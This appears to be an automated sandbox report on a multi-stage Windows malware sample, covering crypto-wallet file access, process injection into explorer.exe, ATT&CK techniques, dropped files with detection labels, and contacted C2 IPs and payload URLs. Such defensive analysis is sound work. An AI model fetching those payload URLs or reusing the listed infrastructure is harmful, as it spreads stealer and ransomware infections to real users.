                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                      Source: Yara matchFile source: 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 602c785fe5.exe PID: 1660, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, type: DROPPED
                      Source: Yara matchFile source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      2
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      System Network Connections Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      12
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Extra Window Memory Injection
                      1
                      Abuse Elevation Control Mechanism
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Exploitation for Client Execution
                      Login Hook912
                      Process Injection
                      41
                      Obfuscated Files or Information
                      NTDS346
                      System Information Discovery
                      Distributed Component Object ModelInput Capture1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      Scheduled Task/Job
                      Network Logon Script2
                      Scheduled Task/Job
                      131
                      Software Packing
                      LSA Secrets1
                      Network Share Discovery
                      SSHKeylogging3
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder
                      1
                      Timestomp
                      Cached Domain Credentials1
                      Query Registry
                      VNCGUI Input Capture114
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync10101
                      Security Software Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      File Deletion
                      Proc Filesystem471
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Extra Window Memory Injection
                      /etc/passwd and /etc/shadow3
                      Process Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron123
                      Masquerading
                      Network Sniffing1
                      Application Window Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd471
                      Virtualization/Sandbox Evasion
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task912
                      Process Injection
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                      Hidden Files and Directories
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573850 Sample: file.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 133 api.telegram.org 2->133 135 youtube.com 2->135 137 26 other IPs or domains 2->137 167 Suricata IDS alerts for network traffic 2->167 169 Found malware configuration 2->169 171 Malicious sample detected (through community Yara rule) 2->171 175 16 other signatures 2->175 11 skotes.exe 3 51 2->11         started        16 file.exe 5 2->16         started        18 skotes.exe 2->18         started        20 dwVrTdy.exe 1 23 2->20         started        signatures3 173 Uses the Telegram API (likely for C&C communication) 133->173 process4 dnsIp5 161 185.215.113.43, 49848, 49856, 49868 WHOLESALECONNECTIONSNL Portugal 11->161 163 185.215.113.16, 49957, 49975, 80 WHOLESALECONNECTIONSNL Portugal 11->163 165 31.41.244.11, 49858, 49872, 49890 AEROEXPRESS-ASRU Russian Federation 11->165 121 C:\Users\user\AppData\...\799e7330b8.exe, PE32 11->121 dropped 123 C:\Users\user\AppData\...\182555961e.exe, PE32 11->123 dropped 125 C:\Users\user\AppData\...\9774053d4c.exe, PE32 11->125 dropped 131 18 other malicious files 11->131 dropped 239 Creates multiple autostart registry keys 11->239 241 Hides threads from debuggers 11->241 243 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->243 22 u1w30Wt.exe 11->22         started        26 d8d3046b98.exe 11->26         started        29 be08f59021.exe 11->29         started        35 4 other processes 11->35 127 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->127 dropped 129 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->129 dropped 245 Detected unpacking (changes PE section rights) 16->245 247 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->247 249 Tries to evade debugger and weak emulator (self modifying code) 16->249 251 Tries to detect virtualization through RDTSC time measurements 16->251 31 skotes.exe 16->31         started        253 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->253 255 Creates files in the system32 config directory 20->255 33 graph.exe 20->33         started        file6 signatures7 process8 dnsIp9 103 C:\Users\user\...\2DB3A69DE7692371543510.exe, PE32+ 22->103 dropped 213 Multi AV Scanner detection for dropped file 22->213 215 Creates multiple autostart registry keys 22->215 233 6 other signatures 22->233 37 svchost.exe 22->37         started        40 audiodg.exe 22->40         started        42 msiexec.exe 22->42         started        151 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 26->151 105 C:\Users\user\AppData\...\softokn3[1].dll, PE32 26->105 dropped 107 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 26->107 dropped 109 C:\Users\user\AppData\...\mozglue[1].dll, PE32 26->109 dropped 117 9 other files (5 malicious) 26->117 dropped 217 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->217 219 Tries to harvest and steal ftp login credentials 26->219 235 3 other signatures 26->235 153 80.82.65.70 INT-NETWORKSC Netherlands 29->153 111 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 29->111 dropped 113 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 29->113 dropped 119 2 other malicious files 29->119 dropped 237 3 other signatures 29->237 221 Detected unpacking (changes PE section rights) 31->221 223 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->223 225 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 31->225 155 api.telegram.org 149.154.167.220, 443, 49903, 49908 TELEGRAMRU United Kingdom 35->155 157 drive.usercontent.google.com 172.217.17.65, 443, 49878, 49883 GOOGLEUS United States 35->157 159 2 other IPs or domains 35->159 115 C:\Program Files\...\graph.exe, PE32+ 35->115 dropped 227 Contains functionality to determine the online IP of the system 35->227 229 Binary is likely a compiled AutoIt script file 35->229 231 Found many strings related to Crypto-Wallets (likely being stolen) 35->231 44 taskkill.exe 35->44         started        46 taskkill.exe 35->46         started        48 taskkill.exe 35->48         started        50 5 other processes 35->50 file10 signatures11 process12 signatures13 195 Injects code into the Windows Explorer (explorer.exe) 37->195 197 Writes to foreign memory regions 37->197 199 Creates a thread in another existing process (thread injection) 37->199 201 Injects a PE file into a foreign processes 37->201 52 explorer.exe 37->52 injected 203 Changes the view of files in windows explorer (hidden files and folders) 40->203 57 conhost.exe 44->57         started        59 conhost.exe 46->59         started        61 conhost.exe 48->61         started        63 conhost.exe 50->63         started        65 conhost.exe 50->65         started        process14 dnsIp15 139 support.mozilla.org 52->139 141 185.81.68.147, 49933, 49938, 49943 KLNOPT-ASFI Finland 52->141 143 4 other IPs or domains 52->143 97 C:\Users\user\AppData\...\FBFF.tmp.fcxcx.exe, PE32 52->97 dropped 99 C:\Users\user\AppData\...\F0A3.tmp.ctx.exe, PE32+ 52->99 dropped 101 C:\Users\user\AppData\...\3417.tmp.vvv.exe, PE32+ 52->101 dropped 205 System process connects to network (likely due to code injection or exploit) 52->205 207 Benign windows process drops PE files 52->207 209 Changes memory attributes in foreign processes to executable or writable 52->209 211 4 other signatures 52->211 67 F0A3.tmp.ctx.exe 52->67         started        71 2DB3A69DE7692371543510.exe 52->71         started        73 FBFF.tmp.fcxcx.exe 52->73         started        75 3 other processes 52->75 file16 signatures17 process18 file19 89 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 67->89 dropped 91 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 67->91 dropped 93 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 67->93 dropped 95 47 other files (7 malicious) 67->95 dropped 177 Multi AV Scanner detection for dropped file 67->177 77 F0A3.tmp.ctx.exe 67->77         started        179 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 71->179 181 Writes to foreign memory regions 71->181 183 Allocates memory in foreign processes 71->183 191 4 other signatures 71->191 79 svchost.exe 71->79         started        82 msiexec.exe 71->82         started        84 audiodg.exe 71->84         started        185 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 73->185 187 Found many strings related to Crypto-Wallets (likely being stolen) 73->187 189 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 73->189 193 2 other signatures 73->193 86 firefox.exe 75->86         started        signatures20 process21 dnsIp22 257 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 79->257 145 youtube.com 142.250.181.78 GOOGLEUS United States 86->145 147 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 86->147 149 2 other IPs or domains 86->149 signatures23

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe100%AviraHEUR/AGEN.1320706
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe100%AviraHEUR/AGEN.1306956
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe100%Joe Sandbox ML
                      C:\Program Files\Windows Media Player\graph\graph.exe0%ReversingLabs
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe58%ReversingLabsWin64.Trojan.Midie
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe50%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe55%ReversingLabsWin32.Trojan.CrypterX
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe37%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe66%ReversingLabsWin32.Trojan.Lumma
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe68%ReversingLabsWin32.Trojan.Mikey
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe26%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exe47%ReversingLabsWin32.Trojan.Symmi
                      C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe63%ReversingLabsWin32.Ransomware.Generic
                      C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe58%ReversingLabsWin64.Trojan.Midie
                      C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe37%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe26%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe47%ReversingLabsWin32.Trojan.Symmi
                      C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe50%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe55%ReversingLabsWin32.Trojan.CrypterX
                      C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe68%ReversingLabsWin32.Trojan.Mikey
                      C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exe34%ReversingLabsWin64.Ransomware.Zusy
                      C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                      C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe29%ReversingLabsWin64.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                      C:\Users\user\AppData\Local\Temp\_MEI36402\VCRUNTIME140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      star-mini.c10r.facebook.com
                      157.240.196.35
                      truefalse
                        high
                        prod.classify-client.prod.webservices.mozgcp.net
                        35.190.72.216
                        truefalse
                          high
                          chrome.cloudflare-dns.com
                          162.159.61.3
                          truefalse
                            high
                            twitter.com
                            104.244.42.65
                            truefalse
                              high
                              prod.detectportal.prod.cloudops.mozgcp.net
                              34.107.221.82
                              truefalse
                                high
                                services.addons.mozilla.org
                                151.101.1.91
                                truefalse
                                  high
                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                  94.245.104.56
                                  truefalse
                                    high
                                    drive.usercontent.google.com
                                    172.217.17.65
                                    truefalse
                                      high
                                      fightlsoser.click
                                      172.67.213.48
                                      truefalse
                                        high
                                        dyna.wikimedia.org
                                        185.15.58.224
                                        truefalse
                                          high
                                          youtube.com
                                          142.250.181.78
                                          truefalse
                                            high
                                            youtube-ui.l.google.com
                                            172.217.19.238
                                            truefalse
                                              high
                                              us-west1.prod.sumo.prod.webservices.mozgcp.net
                                              34.149.128.2
                                              truefalse
                                                high
                                                reddit.map.fastly.net
                                                151.101.1.140
                                                truefalse
                                                  high
                                                  ipinfo.io
                                                  34.117.59.81
                                                  truefalse
                                                    high
                                                    drive.google.com
                                                    216.58.208.238
                                                    truefalse
                                                      high
                                                      www.google.com
                                                      142.250.181.36
                                                      truefalse
                                                        high
                                                        api.telegram.org
                                                        149.154.167.220
                                                        truefalse
                                                          high
                                                          normandy-cdn.services.mozilla.com
                                                          35.201.103.21
                                                          truefalse
                                                            high
                                                            www.reddit.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              ntp.msn.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                support.mozilla.org
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  www.youtube.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    www.facebook.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      detectportal.firefox.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        normandy.cdn.mozilla.net
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          bzib.nelreports.net
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            www.wikipedia.org
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              NameMaliciousAntivirus DetectionReputation
                                                                              http://185.215.113.206/true
                                                                                http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                                                  http://80.82.65.70/dll/downloadfalse
                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.lfirefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://ipinfo.io/missingauthdwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://tempuri.org/Entity/Id23ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://tempuri.org/FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://tempuri.org/Entity/Id2ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://ipinfo.io/jsonN/AipcountrydwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                        http://tempuri.org/Entity/Id21ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://screenshots.firefox.comchrome://browser/skin/menu.svgFailedfirefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?downdwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      https://screenshots.firefox.comfirefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpfalse
